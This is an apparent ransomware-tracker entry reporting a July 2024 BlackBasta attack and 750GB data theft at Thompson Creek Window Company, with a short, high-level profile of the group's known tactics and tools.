Thompson Creek Window Company Hit by BlackBasta Ransomware, 750GB Data Breach
Incident Date:
July 15, 2024
Overview
Title
Thompson Creek Window Company Hit by BlackBasta Ransomware, 750GB Data Breach
Victim
Thompson Creek Window Company
Attacker
Blackbasta
Location
First Reported
July 15, 2024
Thompson Creek Window Company Hit by BlackBasta Ransomware Attack
Company Overview
Thompson Creek Window Company, based in Lanham, Maryland, is a prominent home improvement firm specializing in the manufacturing and installation of replacement windows, doors, gutters, siding, and roofing. Established in 1980, the company has built a reputation for providing high-quality products and services tailored to enhance the aesthetic appeal and value of homes. The company employs a substantial workforce and is recognized for its commitment to customer satisfaction and innovation in home improvement solutions.
Attack Overview
Thompson Creek Window Company has fallen victim to a ransomware attack orchestrated by the BlackBasta group. The attackers have compromised a substantial amount of data, totaling 750GB. The stolen data encompasses a wide range of sensitive information, including corporate data, financial records, and accounting details. Additionally, the breach has exposed human resources information such as hiring data, payroll records, personal tax forms, and various agreements. Personal documents belonging to both employees and clients have also been compromised. The extensive nature of the data breach poses significant risks to the company's operations and the privacy of individuals associated with it.
About BlackBasta Ransomware Group
BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group due to similarities in their approach to malware development, leak sites, and communications for negotiation, payment, and data recovery. BlackBasta targets organizations in the US, Japan, Canada, the United Kingdom, Australia, and New Zealand in highly targeted attacks. They employ a double extortion tactic, encrypting their victim’s critical data and vital servers and threatening to publish sensitive data on their public leak site if the ransom is not paid.
Penetration and Vulnerabilities
BlackBasta employs several strategies to gain initial access to target networks, including spear-phishing campaigns, insider information, and buying network access. Once inside a network, the group uses tools like QakBot, Mimikatz, and exploiting vulnerabilities to move laterally and harvest credentials. For maintaining control over compromised systems, BlackBasta uses tools like Cobalt Strike Beacons, SystemBC, and Rclone. Before encrypting files, BlackBasta takes steps to maximize their leverage, including disabling security tools, deleting shadow copies, and exfiltrating sensitive data.
Sources
Recent Ransomware Attacks
The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.
The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.